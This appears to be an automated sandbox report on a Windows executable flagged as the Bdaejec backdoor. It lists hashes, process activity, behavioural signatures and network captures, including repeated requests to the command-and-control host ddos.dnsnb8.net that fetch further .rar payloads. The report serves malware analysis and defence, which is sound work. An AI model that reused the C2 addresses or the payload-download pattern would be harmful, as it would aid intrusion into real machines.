Analysis

  • max time kernel
    101s
  • max time network
    101s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/02/2025, 13:17 UTC

General

  • Target

    eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe

  • Size

    45KB

  • MD5

    f77eade8e037a9aa137b7c35b4640da0

  • SHA1

    1bb8cf50d814682890d5d0f6cb286512f12cda45

  • SHA256

    eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2

  • SHA512

    4934732c6f9f248f620ccdbf32cebc00bd5f59fbb4d3349c4cd221153a0160bdd75f3b359c5b04e559812be7a15701106cf72e816210b66cdff8085dfa30b236

  • SSDEEP

    768:X7Z2VKKlnDRMyL+TDx8VlF67RvsypS6HkPA0d/1oQGPL4vzZq2o9W7GsxBbPr:V27bMyL6tMlA7R0ypSU0Z1jGCq2iW7z

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
    "C:\Users\Admin\AppData\Local\Temp\eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3788
    • C:\Users\Admin\AppData\Local\Temp\iNbVmR.exe
      C:\Users\Admin\AppData\Local\Temp\iNbVmR.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4756
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6f4e4482.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2120

Network

  • flag-us
    DNS
    ddos.dnsnb8.net
    iNbVmR.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k2.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k2.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    105.84.221.44.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.84.221.44.in-addr.arpa
    IN PTR
    Response
    105.84.221.44.in-addr.arpa
    IN PTR
    ec2-44-221-84-105 compute-1 amazonawscom
  • flag-us
    DNS
    131.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    131.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9; domain=.bing.com; expires=Mon, 02-Mar-2026 13:17:29 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 1DD38138A9B44A26839D255E959F46E8 Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
    date: Wed, 05 Feb 2025 13:17:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=bkkDM99nhmsOA968bAeDDSW8IgC2iD9E7wZHm27KXww; domain=.bing.com; expires=Mon, 02-Mar-2026 13:17:29 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 072B54C4B83E4075A8F4D244861102A7 Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
    date: Wed, 05 Feb 2025 13:17:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9; MSPTC=bkkDM99nhmsOA968bAeDDSW8IgC2iD9E7wZHm27KXww
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5A22266786D54735944ADFC986977D0E Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
    date: Wed, 05 Feb 2025 13:17:28 GMT
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k4.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k4.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    10.27.171.150.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.27.171.150.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    iNbVmR.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 348777
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: FFB1CA2708984238BA9C4897CADB1564 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
    date: Wed, 05 Feb 2025 13:19:07 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 533476
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E2A699F136DE48828BFAA017EEA262BC Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
    date: Wed, 05 Feb 2025 13:19:07 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 532928
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: FB99CA9E894E4539ABB7483856AFC659 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
    date: Wed, 05 Feb 2025 13:19:07 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 289384
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: ABA8FC40AF0448AFB27B9F2E03B95403 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
    date: Wed, 05 Feb 2025 13:19:07 GMT
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    iNbVmR.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k2.rar
    http
    iNbVmR.exe
    472 B
    216 B
    4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k2.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k2.rar
    http
    iNbVmR.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k2.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    iNbVmR.exe
    518 B
    256 B
    5
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    iNbVmR.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=
    tls, http2
    2.0kB
    9.4kB
    22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=

    HTTP Response

    204
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k4.rar
    http
    iNbVmR.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k4.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    iNbVmR.exe
    472 B
    216 B
    4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    iNbVmR.exe
    472 B
    216 B
    4
    5

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    iNbVmR.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    61.4kB
    1.8MB
    1288
    1285

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    iNbVmR.exe
    61 B
    77 B
    1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    105.84.221.44.in-addr.arpa
    dns
    72 B
    127 B
    1
    1

    DNS Request

    105.84.221.44.in-addr.arpa

  • 8.8.8.8:53
    131.160.190.20.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    131.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    10.27.171.150.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    10.27.171.150.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    19.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    19.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VC9D6Q93\k2[1].rar

    Filesize

    4B

    MD5

    d3b07384d113edec49eaa6238ad5ff00

    SHA1

    f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

    SHA256

    b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

    SHA512

    0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

  • C:\Users\Admin\AppData\Local\Temp\188E73F1.exe

    Filesize

    4B

    MD5

    20879c987e2f9a916e578386d499f629

    SHA1

    c7b33ddcc42361fdb847036fc07e880b81935d5d

    SHA256

    9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

    SHA512

    bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

  • C:\Users\Admin\AppData\Local\Temp\6f4e4482.bat

    Filesize

    187B

    MD5

    84c75f41c06fb84fb1e7fa400c7096e3

    SHA1

    320d15ff5c74fce0255708f0667c449193fea773

    SHA256

    749274650e83aad9e0c35ca97453f7404cb7e9fd9572b161c9637ca8e933ea2b

    SHA512

    61fca78075597e2075cc194954a57474db6ef8911dbff3a0e230e8546fef038f0814b380d377d4bb7b59ca58e7f8450077301596902586380fcd5a535935f86c

  • C:\Users\Admin\AppData\Local\Temp\iNbVmR.exe

    Filesize

    15KB

    MD5

    56b2c3810dba2e939a8bb9fa36d3cf96

    SHA1

    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

    SHA256

    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

    SHA512

